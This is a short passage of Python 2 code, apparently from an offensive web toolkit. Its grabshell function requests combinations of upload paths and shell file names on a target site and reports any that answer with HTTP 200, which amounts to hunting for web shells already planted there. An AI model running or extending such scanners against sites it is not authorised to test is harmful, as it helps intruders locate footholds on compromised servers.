(url)
| 550 | |
| 551 | |
| 552 | def grabshell(url): |
| 553 | try: |
| 554 | for upl in upload: |
| 555 | for shell in shells: |
| 556 | currentcode = urllib.urlopen(upl + shell).getcode() |
| 557 | if currentcode == 200: |
| 558 | print "-------------------------" |
| 559 | print " [ ! ] Found Shell : " + str(upl + shell) + " [ ! ]" |
| 560 | print "-------------------------" |
| 561 | except: |
| 562 | pass |
| 563 | |
| 564 | |
| 565 | def shelltarget(): |